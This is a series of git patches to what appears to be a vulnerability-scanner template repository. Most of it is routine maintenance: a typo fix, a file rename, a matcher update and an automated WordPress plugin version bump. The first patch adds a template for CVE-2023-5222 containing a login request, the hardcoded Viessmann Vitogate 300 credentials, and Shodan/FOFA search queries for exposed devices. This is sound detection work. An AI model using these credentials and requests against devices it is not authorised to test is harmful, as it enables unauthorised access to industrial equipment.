From 2f9db30d7a2ac80b94dea8f98f823a497997f3fb Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 30 Jul 2024 12:37:21 +0530 Subject: [PATCH 01/46] Create CVE-2023-5222.yaml --- http/cves/CVE-2023-5222.yaml | 69 ++++++++++++++++++++++++++++++++++++ 1 file changed, 69 insertions(+) create mode 100644 http/cves/CVE-2023-5222.yaml diff --git a/http/cves/CVE-2023-5222.yaml b/http/cves/CVE-2023-5222.yaml new file mode 100644 index 0000000000..5068ade726 --- /dev/null +++ b/http/cves/CVE-2023-5222.yaml @@ -0,0 +1,69 @@ +id: CVE-2023-5222 + +info: + name: Viessmann Vitogate 300 - Hardcoded Password + author: ritikchaddha + severity: critical + description: | + A critical vulnerability in Viessmann Vitogate 300 up to 2.1.3.0 allows attackers to authenticate using hardcoded credentials in the Web Management Interface. + impact: | + An attacker could potentially gain unauthorized access to the device. + remediation: | + Update the device firmware to remove the hardcoded password or change it to a strong, unique password. + reference: + - https://vuldb.com/?ctiid.240364 + - https://vuldb.com/?id.240364 + - https://nvd.nist.gov/vuln/detail/CVE-2023-5222 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-5222 + cwe-id: CWE-259 + epss-score: 0.00164 + epss-percentile: 0.52433 + cpe: cpe:2.3:o:viessmann:vitogate_300_firmware:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 2 + shodan-query: title:"Vitogate 300" + fofa-query: title="Vitogate 300" + vendor: viessmann + product: vitogate_300_firmware + tags: cve,cve2023,viessmann,vitogate,default-login + +http: + - raw: + - | + POST /cgi-bin/vitogate.cgi HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"method":"put","form":"form-login","params":{"uid":"{{username}}","pwd":"{{password}}"}} + + attack: pitchfork + payloads: + username: + - vitomaster + - vitogate + password: + - viessmann1917 + - viessmann + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'admin":true' + - '"sessionId":' + condition: and + + - type: word + part: content_type + words: + - 'application/json' + + - type: status + status: + - 200 From 1f64309ab43d8e54a3b6b95dd0b5da5213f7880a Mon Sep 17 00:00:00 2001 From: Mathieu Geli Date: Tue, 30 Jul 2024 16:57:14 +0200 Subject: [PATCH 02/46] Fix typo in CVE-2024-20767.yaml --- http/cves/2024/CVE-2024-20767.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2024/CVE-2024-20767.yaml b/http/cves/2024/CVE-2024-20767.yaml index ec6496cc66..22dc41dc11 100644 --- a/http/cves/2024/CVE-2024-20767.yaml +++ b/http/cves/2024/CVE-2024-20767.yaml @@ -23,7 +23,7 @@ info: verified: true max-request: 2 shodan-query: http.component:"Adobe ColdFusion" - tags: cve,cve2024,adobe,condfusion,lfr + tags: cve,cve2024,adobe,coldfusion,lfr http: - raw: @@ -53,4 +53,4 @@ http: regex: - "(.*)" internal: true -# digest: 4a0a00473045022100e6a9a13cc692e12629ce4b557e8a9cdaab2f6b3df9155e2bb4f5cac00241469b0220351a6751dda75fd857b8ac90f6cdca44f5853c3c3019070572245e97c7aec3eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e6a9a13cc692e12629ce4b557e8a9cdaab2f6b3df9155e2bb4f5cac00241469b0220351a6751dda75fd857b8ac90f6cdca44f5853c3c3019070572245e97c7aec3eb:922c64590222798bb761d5b6d8e72950 From 0bd27e2b0432ea52bfb9f95bb3e778d2fea1de66 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 30 Jul 2024 20:42:19 +0530 Subject: [PATCH 03/46] Rename http/cves/CVE-2023-5222.yaml to http/cves/2023/CVE-2023-5222.yaml --- http/cves/{ => 2023}/CVE-2023-5222.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename http/cves/{ => 2023}/CVE-2023-5222.yaml (100%) diff --git a/http/cves/CVE-2023-5222.yaml b/http/cves/2023/CVE-2023-5222.yaml similarity index 100% rename from http/cves/CVE-2023-5222.yaml rename to http/cves/2023/CVE-2023-5222.yaml From 717f3fed222dbf7545cf28bc27e857b0b0ac27c7 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 31 Jul 2024 15:18:43 +0530 Subject: [PATCH 04/46] Update cs141-default-login.yaml --- http/default-logins/abb/cs141-default-login.yaml | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/http/default-logins/abb/cs141-default-login.yaml b/http/default-logins/abb/cs141-default-login.yaml index 4dacd946b2..92de98ea9f 100644 --- a/http/default-logins/abb/cs141-default-login.yaml +++ b/http/default-logins/abb/cs141-default-login.yaml @@ -45,6 +45,13 @@ http: condition: and part: header + - type: word + part: body + words: + - 'accessToken' + - 'AdminFirstTime' + condition: and + - type: status status: - 200 From e03bd0d6cfe127e5122192548b0a97b965b6cdc7 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 1 Aug 2024 00:22:30 +0000 Subject: [PATCH 05/46] Auto WordPress Plugins Update [Thu Aug 1 00:22:30 UTC 2024] :robot: --- helpers/wordpress/plugins/chaty.txt | 2 +- helpers/wordpress/plugins/copy-delete-posts.txt | 2 +- helpers/wordpress/plugins/google-listings-and-ads.txt | 2 +- helpers/wordpress/plugins/gutenberg.txt | 2 +- helpers/wordpress/plugins/hostinger.txt | 2 +- helpers/wordpress/plugins/pixelyoursite.txt | 2 +- helpers/wordpress/plugins/woocommerce-payments.txt | 2 +- helpers/wordpress/plugins/wp-smushit.txt | 2 +- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 - http/technologies/wordpress/plugins/add-to-any.yaml | 1 - http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 - .../technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 - http/technologies/wordpress/plugins/akismet.yaml | 1 - http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 - .../wordpress/plugins/all-in-one-wp-migration.yaml | 1 - .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 - http/technologies/wordpress/plugins/amp.yaml | 1 - http/technologies/wordpress/plugins/antispam-bee.yaml | 1 - http/technologies/wordpress/plugins/astra-sites.yaml | 1 - http/technologies/wordpress/plugins/autoptimize.yaml | 1 - http/technologies/wordpress/plugins/backwpup.yaml | 1 - http/technologies/wordpress/plugins/better-search-replace.yaml | 1 - http/technologies/wordpress/plugins/better-wp-security.yaml | 1 - .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 - http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 - http/technologies/wordpress/plugins/breeze.yaml | 1 - http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 - http/technologies/wordpress/plugins/chaty.yaml | 1 - .../wordpress/plugins/child-theme-configurator.yaml | 1 - http/technologies/wordpress/plugins/classic-editor.yaml | 1 - http/technologies/wordpress/plugins/classic-widgets.yaml | 1 - .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 - http/technologies/wordpress/plugins/cmb2.yaml | 1 - http/technologies/wordpress/plugins/coblocks.yaml | 1 - http/technologies/wordpress/plugins/code-snippets.yaml | 1 - http/technologies/wordpress/plugins/coming-soon.yaml | 1 - http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 - .../wordpress/plugins/contact-form-7-honeypot.yaml | 1 - http/technologies/wordpress/plugins/contact-form-7.yaml | 1 - http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 - http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 - http/technologies/wordpress/plugins/cookie-notice.yaml | 1 - http/technologies/wordpress/plugins/copy-delete-posts.yaml | 1 - http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 - .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 - http/technologies/wordpress/plugins/custom-css-js.yaml | 1 - http/technologies/wordpress/plugins/custom-fonts.yaml | 1 - http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 - http/technologies/wordpress/plugins/disable-comments.yaml | 1 - http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 - http/technologies/wordpress/plugins/duplicate-page.yaml | 1 - http/technologies/wordpress/plugins/duplicate-post.yaml | 1 - http/technologies/wordpress/plugins/duplicator.yaml | 1 - .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 - .../technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 - http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 - http/technologies/wordpress/plugins/elementor.yaml | 1 - http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 - http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 - http/technologies/wordpress/plugins/envato-elements.yaml | 1 - .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 - http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 - .../wordpress/plugins/facebook-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 - .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 - http/technologies/wordpress/plugins/flamingo.yaml | 1 - http/technologies/wordpress/plugins/fluent-smtp.yaml | 1 - http/technologies/wordpress/plugins/fluentform.yaml | 1 - http/technologies/wordpress/plugins/font-awesome.yaml | 1 - .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/formidable.yaml | 1 - http/technologies/wordpress/plugins/forminator.yaml | 1 - http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 - .../technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 - .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 - .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 - .../wordpress/plugins/google-listings-and-ads.yaml | 3 +-- http/technologies/wordpress/plugins/google-site-kit.yaml | 1 - .../wordpress/plugins/google-sitemap-generator.yaml | 1 - http/technologies/wordpress/plugins/gtranslate.yaml | 1 - http/technologies/wordpress/plugins/gutenberg.yaml | 1 - .../technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 - .../wordpress/plugins/header-footer-code-manager.yaml | 1 - .../wordpress/plugins/header-footer-elementor.yaml | 1 - http/technologies/wordpress/plugins/header-footer.yaml | 1 - http/technologies/wordpress/plugins/health-check.yaml | 1 - http/technologies/wordpress/plugins/hello-dolly.yaml | 1 - http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 - http/technologies/wordpress/plugins/hostinger.yaml | 1 - http/technologies/wordpress/plugins/image-optimization.yaml | 1 - http/technologies/wordpress/plugins/imagify.yaml | 1 - http/technologies/wordpress/plugins/imsanity.yaml | 1 - .../wordpress/plugins/insert-headers-and-footers.yaml | 1 - http/technologies/wordpress/plugins/instagram-feed.yaml | 1 - .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 - http/technologies/wordpress/plugins/jetpack.yaml | 1 - http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 - http/technologies/wordpress/plugins/kirki.yaml | 1 - http/technologies/wordpress/plugins/leadin.yaml | 1 - .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 - http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 - http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 - http/technologies/wordpress/plugins/loco-translate.yaml | 1 - http/technologies/wordpress/plugins/loginizer.yaml | 1 - .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 - http/technologies/wordpress/plugins/mailpoet.yaml | 1 - http/technologies/wordpress/plugins/maintenance.yaml | 1 - http/technologies/wordpress/plugins/mainwp-child.yaml | 1 - http/technologies/wordpress/plugins/malcare-security.yaml | 1 - http/technologies/wordpress/plugins/megamenu.yaml | 1 - http/technologies/wordpress/plugins/members.yaml | 1 - http/technologies/wordpress/plugins/meta-box.yaml | 1 - http/technologies/wordpress/plugins/metform.yaml | 1 - http/technologies/wordpress/plugins/ml-slider.yaml | 1 - http/technologies/wordpress/plugins/newsletter.yaml | 1 - .../wordpress/plugins/nextend-facebook-connect.yaml | 1 - http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 - http/technologies/wordpress/plugins/ninja-forms.yaml | 1 - http/technologies/wordpress/plugins/ocean-extra.yaml | 1 - .../wordpress/plugins/official-facebook-pixel.yaml | 1 - http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 - http/technologies/wordpress/plugins/optinmonster.yaml | 1 - http/technologies/wordpress/plugins/otter-blocks.yaml | 1 - http/technologies/wordpress/plugins/password-protected.yaml | 1 - http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 - .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 - http/technologies/wordpress/plugins/polylang.yaml | 1 - http/technologies/wordpress/plugins/popup-maker.yaml | 1 - http/technologies/wordpress/plugins/post-smtp.yaml | 1 - http/technologies/wordpress/plugins/post-types-order.yaml | 1 - .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 - http/technologies/wordpress/plugins/pretty-link.yaml | 1 - http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 - http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 - http/technologies/wordpress/plugins/redirection.yaml | 1 - http/technologies/wordpress/plugins/redux-framework.yaml | 1 - http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 - .../technologies/wordpress/plugins/royal-elementor-addons.yaml | 1 - http/technologies/wordpress/plugins/safe-svg.yaml | 1 - http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 - http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 - http/technologies/wordpress/plugins/sg-security.yaml | 1 - http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 - .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 - .../wordpress/plugins/simple-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/siteguard.yaml | 1 - http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 - http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 - http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 - .../wordpress/plugins/sticky-header-effects-for-elementor.yaml | 1 - .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 - http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 - .../technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 - http/technologies/wordpress/plugins/tablepress.yaml | 1 - http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 - http/technologies/wordpress/plugins/templately.yaml | 1 - http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 - http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 - .../wordpress/plugins/translatepress-multilingual.yaml | 1 - .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 - .../wordpress/plugins/under-construction-page.yaml | 1 - http/technologies/wordpress/plugins/updraftplus.yaml | 1 - http/technologies/wordpress/plugins/user-role-editor.yaml | 1 - http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 - .../wordpress/plugins/webp-converter-for-media.yaml | 1 - http/technologies/wordpress/plugins/webp-express.yaml | 1 - .../wordpress/plugins/widget-importer-exporter.yaml | 1 - .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 - .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 - .../technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 - .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 - .../wordpress/plugins/woocommerce-legacy-rest-api.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 - .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 - .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 - http/technologies/wordpress/plugins/woocommerce.yaml | 1 - http/technologies/wordpress/plugins/wordfence.yaml | 1 - http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 - http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 - http/technologies/wordpress/plugins/worker.yaml | 1 - http/technologies/wordpress/plugins/wp-crontrol.yaml | 1 - http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 - http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 - http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 - http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 - http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 - http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 - http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 - http/technologies/wordpress/plugins/wp-optimize.yaml | 1 - http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 - http/technologies/wordpress/plugins/wp-reset.yaml | 1 - .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 - http/technologies/wordpress/plugins/wp-rollback.yaml | 1 - http/technologies/wordpress/plugins/wp-seopress.yaml | 1 - http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 - http/technologies/wordpress/plugins/wp-smushit.yaml | 1 - http/technologies/wordpress/plugins/wp-statistics.yaml | 1 - http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 - http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 - http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 - http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 - .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 - 208 files changed, 9 insertions(+), 209 deletions(-) diff --git a/helpers/wordpress/plugins/chaty.txt b/helpers/wordpress/plugins/chaty.txt index 6a3913b049..132d9f7707 100644 --- a/helpers/wordpress/plugins/chaty.txt +++ b/helpers/wordpress/plugins/chaty.txt @@ -1 +1 @@ -3.2.7 \ No newline at end of file +3.2.8 \ No newline at end of file diff --git a/helpers/wordpress/plugins/copy-delete-posts.txt b/helpers/wordpress/plugins/copy-delete-posts.txt index b000a6a063..721b9931f4 100644 --- a/helpers/wordpress/plugins/copy-delete-posts.txt +++ b/helpers/wordpress/plugins/copy-delete-posts.txt @@ -1 +1 @@ -1.4.7 \ No newline at end of file +1.4.8 \ No newline at end of file diff --git a/helpers/wordpress/plugins/google-listings-and-ads.txt b/helpers/wordpress/plugins/google-listings-and-ads.txt index 62ae32d582..6533b66871 100644 --- a/helpers/wordpress/plugins/google-listings-and-ads.txt +++ b/helpers/wordpress/plugins/google-listings-and-ads.txt @@ -1 +1 @@ -2.7.7 \ No newline at end of file +2.8.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/gutenberg.txt b/helpers/wordpress/plugins/gutenberg.txt index 6238d6cf77..a2e88ffb42 100644 --- a/helpers/wordpress/plugins/gutenberg.txt +++ b/helpers/wordpress/plugins/gutenberg.txt @@ -1 +1 @@ -18.8.0 \ No newline at end of file +18.9.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/hostinger.txt b/helpers/wordpress/plugins/hostinger.txt index 7da3c16870..8ffc1ad640 100644 --- a/helpers/wordpress/plugins/hostinger.txt +++ b/helpers/wordpress/plugins/hostinger.txt @@ -1 +1 @@ -3.0.5 \ No newline at end of file +3.0.6 \ No newline at end of file diff --git a/helpers/wordpress/plugins/pixelyoursite.txt b/helpers/wordpress/plugins/pixelyoursite.txt index a50bd44872..c83418e835 100644 --- a/helpers/wordpress/plugins/pixelyoursite.txt +++ b/helpers/wordpress/plugins/pixelyoursite.txt @@ -1 +1 @@ -9.7.0.1 \ No newline at end of file +9.7.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/woocommerce-payments.txt b/helpers/wordpress/plugins/woocommerce-payments.txt index e048e60ec1..5210382a7a 100644 --- a/helpers/wordpress/plugins/woocommerce-payments.txt +++ b/helpers/wordpress/plugins/woocommerce-payments.txt @@ -1 +1 @@ -7.9.2 \ No newline at end of file +8.0.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-smushit.txt b/helpers/wordpress/plugins/wp-smushit.txt index 185e484bdd..3cd036c470 100644 --- a/helpers/wordpress/plugins/wp-smushit.txt +++ b/helpers/wordpress/plugins/wp-smushit.txt @@ -1 +1 @@ -3.16.5 \ No newline at end of file +3.16.6 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index abaf3eff08..3fd2256749 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f36c560f74676f791f1934da3e3fa2a1c34045ba97b7cb378f6da7118e1372f5022007f4901c1254dbe0ea148b66aeda99bde7c358a4e8ae6914cd6aa459c03d00b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index b1906e5aad..6a0d344b63 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022047b773e54b7d2133d0d0a410d1af46f4040e06e6117e1aaf3a95d0d69997c53102203b01dcf3bbf908b9abe4da67f2a9e9a0ed22ab9150241be31cceefa91ea2f015:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 11f16d7668..6fb5080bc8 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202ce33574e3b018b75d389fee9fd3636b5aece92b5e58066a53bc43324c9dd57a022012815c05d76395e0c8f9b873d4552fb60b841e9472f8f26219c3fcdc3ecdb697:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index cb2983c073..cddbb4bb2e 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f90b5c64f5e2ba5400e345f2353252f8e98caac3c2cb1efce0a55e06d9cf430702204c18646406c16f03608d01b9371e1081844c8014a696f3323d212b6409506c5f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 3366903de9..6f253f9f55 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203a6f0c7df79a258c742fa868a964e4d46b86919a8f39c7cf64ca675cd14e819e0220344e033ed04d94404ef0949f46cd8fa71098cf8fdcbb53d9e9816fba491214bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 78d761be00..fe45de4d04 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220330d517911db2bc4a00124e36e514a002d8b4b0b637cc8d21b1784fe0e6ed24e0221009cdc038f99a2261a42cb4439b895391b8fa3425a9fc424a8d7629e81d56166c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index e8975d69e2..69e425f446 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f2b34731b9796a79058fc0d2e1d69d4f513380815ab86f9e45c880f0bc31a3550220057119ebd81bf898e2e82519d16dd291266a88f231e4b8292c8066da7ce04de8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index d043e89fc2..9c07c65e4e 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a621799f480dc9d982f6aef8eeeccefeda6dea8b96d7fdebb8222431fe45b8ef022100896a5f6c53544a89128a7b1b67692a28789ab443f1b110407b8722a6c89fb8b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 357efc2f1f..92c8f5656e 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202e739a62b48fbd873d766243f85310b8e9c048817c16e45cb6e291f2facbb41302202120965ec8596a5d028c5a500e2b77d45e5946a3cd55dcc75ededef61a616b70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 097410bc96..70975a19a1 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022045ef2ea384c7b3f098ed5fcda2db643c76e4a4b563cb667ab6000511dfd1bf6b022018451c7b800c7bfac41fe3f50ff82f70b557c7fc0637e26902423c7322ff00c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index ed64942e0c..fd7e3e99dd 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ec5fc96a9c62987b9914f1748ba08f441cd5c72a2d13b80e11d3230800e43ff90221009554c7e89e0f62d841c998c0313bf3bc79dfabee85db79f39037d5c32fa5d14b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index cc6d0f3b93..18f2a2ae84 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100aeedc10cdba61c2286e89cb8182a37c95ee8157a342aa873c1ce5005346446460220453a05274572ba573b4691cab5ea826c0c3d202f56f0a6ebeb7e83df09927744:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 7975142a74..11cb41fb2c 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210080833f0a6f6965bf701a9f8f85c42f13aced2edfa3c92f35b7bf9b2949f30c92022010f4ca3a59b6d406300c386db8a6df73c29dbe232100869a5813747db8f85ee1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index 207bf964b4..df3c5f3a94 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f1d2f7f6be6fddf20850b4703b6ab5b8d957c3e74b071534c1bc6ad7fe41436502202a71f99ce82762f27add68abbe7a23d4240623238e94b985bfca1ee61f0d6da8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index c79da31bb6..6a50e049dc 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# 